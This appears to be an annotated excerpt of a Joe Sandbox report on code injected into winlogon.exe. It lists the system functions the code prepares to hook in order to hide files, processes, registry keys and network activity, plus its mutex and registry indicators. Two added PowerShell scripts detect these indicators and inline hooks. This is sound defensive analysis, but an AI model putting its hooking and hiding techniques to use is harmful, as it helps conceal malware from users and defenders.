                                                                                                            • Instruction ID: cf0282bb4f48f30ffcba822019b823f7b8800bf24808c34562f9918938dd46bd
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: 6F711976710A9086EB209FA6ECC879977A8F784B89F801163DE4D47B79EF79C944C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
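The two records above expose host artifacts of the code injected into winlogon.exe: the Global\ mutex it opens (OpenMutex/CloseHandle record) and the registry configuration it reads (SOFTWARE\ ... sxrconfig, with the names paths, pid, process_names, service_names, startup, tcp_local, tcp_remote and udp). The following PowerShell is an added example for checking a host for both, not code from the Joe Sandbox report or from the sample. It assumes the hive is HKLM, reads the report's `$` as its string separator (so both `sxrconfig` and `$sxrconfig` are tried), and does not know whether each listed name is a value or a subkey, so it checks both shapes; the function names are this example's own.

```powershell
# Added example, not part of the Joe Sandbox report: check a host for the mutex
# and the registry configuration the injected code references. Assumptions:
# HKLM hive, '$' in the report is a string separator, names may be values or
# subkeys. Run elevated so Global\ objects created by other sessions are visible.

$MutexName     = 'Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw'
$CandidateKeys = @('HKLM:\SOFTWARE\sxrconfig', 'HKLM:\SOFTWARE\$sxrconfig')
$ConfigNames   = @('paths', 'pid', 'process_names', 'service_names', 'startup', 'tcp_local', 'tcp_remote', 'udp')

function Test-MutexPresent {
    param([string]$Name)
    try {
        # OpenExisting succeeds only if some process has already created the mutex.
        $m = [System.Threading.Mutex]::OpenExisting($Name)
        $m.Dispose()
        return $true
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        return $false
    } catch [System.UnauthorizedAccessException] {
        # The object exists but our token cannot open it: still a hit.
        return $true
    }
}

function Get-ConfigKeyContents {
    param([string]$Key, [string[]]$Names)
    if (-not (Test-Path -LiteralPath $Key)) { return $null }
    $item  = Get-Item -LiteralPath $Key
    $found = [ordered]@{}
    foreach ($n in $Names) {
        # Shape 1: the name is a value directly under the config key.
        $v = $item.GetValue($n, $null)
        if ($null -ne $v) { $found[$n] = $v }
        # Shape 2: the name is a subkey whose values are the individual entries.
        $sub = Join-Path -Path $Key -ChildPath $n
        if (Test-Path -LiteralPath $sub) {
            $found[$n] = (Get-Item -LiteralPath $sub).GetValueNames()
        }
    }
    [pscustomobject]@{ Key = $Key; Subkeys = $item.GetSubKeyNames(); Config = $found }
}

$hits = @()
if (Test-MutexPresent -Name $MutexName) { $hits += "mutex present: $MutexName" }
foreach ($k in $CandidateKeys) {
    $cfg = Get-ConfigKeyContents -Key $k -Names $ConfigNames
    if ($cfg) {
        $hits += "registry config present: $k"
        $cfg | Format-List | Out-String | Write-Output
    }
}
if ($hits.Count -eq 0) { 'none of the indicators from this report were found' } else { $hits }
```

One caveat when running this on a live host: the record further down shows the injected code resolving NtEnumerateKey and NtEnumerateValueKey by name, so registry enumeration from a process the code has injected into may be blinded; opening the key by its exact name is a different code path, but the dependable check is from a process the code has not reached, or against an offline copy of the SOFTWARE hive.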

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: 5beddea99a606811880e9ac37e0bf7976a19d7c1deaf2c6cb1d3b5cef6364cbc
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 8141AA641109CAE4FF08DBD4EDDA7D47725A704784FC084A3A50D12179AEBADF8DD351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
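The record above shows the injected code resolving a fixed set of exports by name with GetProcAddress after loading ntdll.dll, advapi32.dll, sechost.dll and spopk.dll, which is the preparation step for placing inline hooks on them. The following PowerShell is an added example, not code from the report or the sample, that checks whether the ntdll exports named in the record still begin with the normal x64 syscall stub (`mov r10, rcx ; mov eax, <ssn>`), the bytes an inline hook overwrites. It assumes 64-bit Windows, and it inspects the calling PowerShell process's own ntdll, which is only meaningful on the assumption that the code injects into every new process (the hooked NtResumeThread in the list is what such injectors typically use for that); the non-ntdll names in the record (EnumServiceGroupW, EnumServicesStatusExW, Sysprep_Clean_Validate_Opk) are not syscall stubs and are not covered by this pattern test. The P/Invoke declarations are standard kernel32 signatures; the helper names are this example's own.

```powershell
# Added example, not part of the Joe Sandbox report: flag ntdll exports from the
# record whose entry bytes no longer match the x64 syscall stub prologue.
# Assumptions: 64-bit Windows; the process running this script would itself be
# injected by the sample, so its own ntdll is worth checking.

Add-Type -Namespace Win32 -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetModuleHandle(string name);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr module, string name);
'@

# Exports taken from the report's string list for this function.
$Targets = @(
    'NtQueryDirectoryFile', 'NtQueryDirectoryFileEx', 'NtQuerySystemInformation',
    'NtEnumerateKey', 'NtEnumerateValueKey', 'NtDeviceIoControlFile', 'NtResumeThread'
)

function Get-EntryBytes {
    param([string]$Module, [string]$Export, [int]$Count = 8)
    $h = [Win32.Native]::GetModuleHandle($Module)
    if ($h -eq [IntPtr]::Zero) { throw "module not loaded: $Module" }
    $p = [Win32.Native]::GetProcAddress($h, $Export)
    if ($p -eq [IntPtr]::Zero) { throw "export not found: ${Module}!${Export}" }
    $buf = New-Object byte[] $Count
    # Reading our own address space needs no extra privilege.
    [System.Runtime.InteropServices.Marshal]::Copy($p, $buf, 0, $Count)
    return ,$buf
}

function Test-SyscallStub {
    param([byte[]]$Bytes)
    # Expected x64 prologue: 4C 8B D1 (mov r10,rcx)  B8 xx xx xx xx (mov eax,imm32)
    return ($Bytes[0] -eq 0x4C -and $Bytes[1] -eq 0x8B -and $Bytes[2] -eq 0xD1 -and $Bytes[3] -eq 0xB8)
}

foreach ($name in $Targets) {
    $b   = Get-EntryBytes -Module 'ntdll.dll' -Export $name
    $hex = ($b | ForEach-Object { $_.ToString('X2') }) -join ' '
    if (Test-SyscallStub -Bytes $b) {
        $ssn = [BitConverter]::ToInt32($b, 4)
        '{0,-26} ok     ssn=0x{1:X}  [{2}]' -f $name, $ssn, $hex
    } else {
        # E9 (jmp rel32) or FF 25 (jmp [rip+disp32]) at the entry is the usual inline-hook trampoline.
        '{0,-26} HOOK?  [{1}]' -f $name, $hex
    }
}
```

A clean host prints `ok` with a plausible syscall number for every export; a `HOOK?` line with `E9` or `FF 25` as the first bytes is the pattern to escalate. The check only sees hooks placed on the first instructions, and only in the process it runs in, so a negative result from one PowerShell session is not proof that other processes, winlogon.exe included, are unhooked.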

                                                                                                            Control-flow Graph

                                                                                                             Control-flow graph of the function at 2d0165e5cb0 (rendered graph not preserved; only the API calls visible in the graph nodes are kept, in address order): GetCurrentThreadId (2d0165e5ceb), GetThreadContext (2d0165e5e3c), SetThreadContext (2d0165e5ebe), VirtualProtect and FlushInstructionCache (2d0165e5fc1), ResumeThread (2d0165e60b7).
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: 5386dfe54a7a50d35eb2be07e6f988aad87b53fd4122ef09ab1729645e20a04d
                                                                                                            • Instruction ID: 827840bbf32c1ab4604c7a48a0d278e65cc8801cf0df14b7f3a30d8c4ea63e3b
                                                                                                            • Opcode Fuzzy Hash: 5386dfe54a7a50d35eb2be07e6f988aad87b53fd4122ef09ab1729645e20a04d
                                                                                                            • Instruction Fuzzy Hash: 06D19D76209B8885DB709B5AE89435AB7A0F7C8B88F500256EACD477B5DF3DCA51CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                             Control-flow graph of the function at 2d0165e5250 (rendered graph not preserved; only the API calls visible in the graph nodes are kept, in address order): GetCurrentThreadId (2d0165e52d6), two calls to 2d0165e5860 (2d0165e534e), VirtualProtect (2d0165e5748), GetLastError (2d0165e57e3).
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 8690d158449b8bab1d0ea726d75a28fb1a1f16844745daff30852d95de4f148f
                                                                                                            • Instruction ID: ff4c9e394f4f633e6f1f47a6c809148161092db0380fabb132dcaef3393a161c
                                                                                                            • Opcode Fuzzy Hash: 8690d158449b8bab1d0ea726d75a28fb1a1f16844745daff30852d95de4f148f
                                                                                                            • Instruction Fuzzy Hash: 4C02B936219BC486EB60CB95E89435AF7A0F3C4794F504116EACE87BA9DF7EC954CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092925422-0
                                                                                                            • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction ID: c2e338edc5dde43fb8e82cd134809c79a1c2ddc2a18675da9b4e7e84532af290
                                                                                                            • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction Fuzzy Hash: 0D113026605B8183EF24DF91E888759B7B4F745B80F844127DA4D437A5EF3EC944C744
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 31662377-0
                                                                                                            • Opcode ID: e557402e9dd73df416ea533ec671a1600cb4b40425ccbc5a1acba7d83a866da0
                                                                                                            • Instruction ID: 919a1b6c2e3fa8f9fed85d43b09728acdc6dae48b1b9fd9c76b8407471fff654
                                                                                                            • Opcode Fuzzy Hash: e557402e9dd73df416ea533ec671a1600cb4b40425ccbc5a1acba7d83a866da0
                                                                                                            • Instruction Fuzzy Hash: 36312A22619AC481EF30DB55E89835EE6A4F7887C4F900516F6CE467B9DF7ECB408B04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandleLibraryLoadPath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3330075603-0
                                                                                                            • Opcode ID: 07b1fef9b75676cc8ab7ce167cd629578b86cc052029fc02db47c51d3d35c015
                                                                                                            • Instruction ID: 6404377c290bac5c135d6157a5486d4f5feab7838e636db9dc56e7921b1ad9b1
                                                                                                            • Opcode Fuzzy Hash: 07b1fef9b75676cc8ab7ce167cd629578b86cc052029fc02db47c51d3d35c015
                                                                                                            • Instruction Fuzzy Hash: 041184706107C141FF2097E0ADCD759A791A754745FC004ABD91E866B6EF3ACE84C600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3733156554-0
                                                                                                            • Opcode ID: 8f375e4fb9d4ea77231e8d2b36d888ad2401ffeed29037c9415508a6c378e2d6
                                                                                                            • Instruction ID: 403759c975e8939f7a96540f258f7a09ca7a55f223a7a15aaf64dd259946e79d
                                                                                                            • Opcode Fuzzy Hash: 8f375e4fb9d4ea77231e8d2b36d888ad2401ffeed29037c9415508a6c378e2d6
                                                                                                            • Instruction Fuzzy Hash: 19F0D626219B8481DB30DB45E89575AA7A0E3C8BD8F940116FA8D07B79CF3DCA91CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                             Control-flow graph of the function at 2d0165829a0 (rendered graph not preserved; only the API calls visible in the graph nodes are kept, in address order): four calls to 2d016580f34 (2d0165829a0), VirtualAlloc (2d016582a2c), LoadLibraryA (2d016582ac3).
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3363718104.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016580000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3550616410-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: f621cb290c08b2b46b1e683fa066f38823c56fcd4ce4b08d2a6cfbd1d588fe07
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 9B61236270229087EB68CF96D89877DB799FB04BD4F84C426DA1D07BA5DB38EC52C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 000002D0165E1650: GetProcessHeap.KERNEL32 ref: 000002D0165E165B
                                                                                                              • Part of subcall function 000002D0165E1650: HeapAlloc.KERNEL32 ref: 000002D0165E166A
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16DA
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1707
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1721
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1741
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E175C
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E177C
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1797
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17B7
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E17D2
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17F2
                                                                                                            • Sleep.KERNEL32 ref: 000002D0165E1C43
                                                                                                            • SleepEx.KERNEL32 ref: 000002D0165E1C49
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E180D
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E182D
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1848
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1868
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1883
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E18A3
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E18BE
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E18C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1534210851-0
                                                                                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                            • Instruction ID: 5dc8fc1c7f53c2855e68788d676a44e8de49ae7f1874ae2914d3f5803c86c972
                                                                                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                            • Instruction Fuzzy Hash: 5D31E36930168591FF709FB6DEC939EB3A6AB44BC2FC45023DE0D876B6DE15CE508250
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3367386735.000002D016730000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016730000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016730000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 69b96e43718376f6964ff8b5aed6cffbc896fd5f412ec1af6c670a2741242d08
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 8C612222701690C3EF68CF99D89476DB391FB04B94F84C222DA2D0B7A5EB38EC52D700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3365813918.000002D016670000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016670000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016670000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: b6e01f60ad4133ef139cb0c1c0da6606ab56af6d46f7cd633a6e7c8fcd2936e5
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: B461046270129087EBA8CF95D89476DB395FB44F9CF84C42ADA1D077A5DB38EC52C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3368283815.000002D016790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016790000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016790000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: a5c696ece6840d160d3342222ed5ad3df6fa06ee52d2d941190d07041a3bb003
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 8C61256272129087EF58EF95D89476D73E1FB04BA8F84C226DA2D077A5EA38DC52C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3366586032.000002D0166D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D0166D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0166d0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 5870d79ba02e1a25a039791317dfab8b233fd86703b5ebe479e284bbe8979977
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 6361136270129087EAA8CFD5D89476DB395FB44BA8F94C42ADB8D077E5DA38EC52C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%